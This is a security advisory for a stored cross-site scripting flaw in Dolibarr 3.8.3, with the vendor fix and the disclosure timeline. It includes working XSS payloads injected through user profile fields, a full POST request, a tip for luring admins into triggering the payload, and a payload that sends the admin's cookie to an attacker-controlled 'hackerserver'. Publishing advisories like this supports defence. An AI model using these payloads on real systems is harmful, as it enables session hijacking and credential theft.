###################################################################### # Exploit Title: XSS on dolibarr 3.8.3 # Date: 03/01/2016 # Author: Mickael Dorigny @ Synetis # Vendor or Software Link: http://www.dolibarr.org/ # Category: XSS ###################################################################### Dolibarr description : ====================================================================== Dolibarr ERP & CRM is a modern and easy to use web software to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc...). It's opensource and free software designed for small companies, foundations and freelances. You can install and use it as a standalone application, or online on a mutualized or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services. Vulnerability description : ====================================================================== A Stored XSS is available in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it. This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes. PoC n1 : Stored XSS in user attributes: ==================================== Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges. Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic JavaScript tips like "<script>" tags or "onerror" JavaScript. But some other events or still allowed. Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid JavaScript instructions in the administrator browser or in browser of other users allowed to check user's attributes. PoC : As an authenticated user, fullfill "Last name", "First name", "email", "job" or "signature" input with this : user1<img src=x onmouseover=alert(1)> [REQUEST] http://server/dolibarr/htdocs/user/card.php?id=2 [POSTDATA] -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="token" 3e01b40f4659396870a384c16213e400 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="action" update -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="entity" 1 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="lastname" user1<img src=x onmouseover=alert(1)> -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="firstname" user1<img src=x onmouseover=alert(1)> -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="job" user1<img src=x onmouseover=alert(1)> -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="gender" man -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="login" user1 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="password" user1 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="admin" 0 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="superadmin" 0 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="office_phone" -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="user_mobile" -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="office_fax" -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="email" user1<img src=x onmouseover=alert(1)> -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="signature" user1<img src=x onmouseover=alert(1)> -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="fk_user" -1 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="weeklyhours" 0 -----------------------------7677991721297181448923571907 Content-Disposition: form-data; name="save" Save -----------------------------7677991721297181448923571907-- Note that "First name" and "Last name" input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes. Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like 1920*1080) that will cover all the website page. Once attributes are modified. Another user like an admin can check your attributes and then execute JavaScript instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the "signature" input : <img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+""> Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies. Screenshots : ====================================================================== - http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg - http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg - http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg Solution: ====================================================================== The fix concerning this vulnerability is available on Dolibarr github repository : https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56 Additional resources : ====================================================================== - https://www.youtube.com/watch?v=p2rFWJOCJC8 - http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/ - https://github.com/Dolibarr/dolibarr/issues/4341 - https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56 Report timeline : ====================================================================== 2016-01-03 : Editor informed for vulnerability 2016-01-07 : Vulnerability is fixed 2016-01-11 : Advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr -- SYNETIS CONTACT: www.synetis.com | www.information-security.fr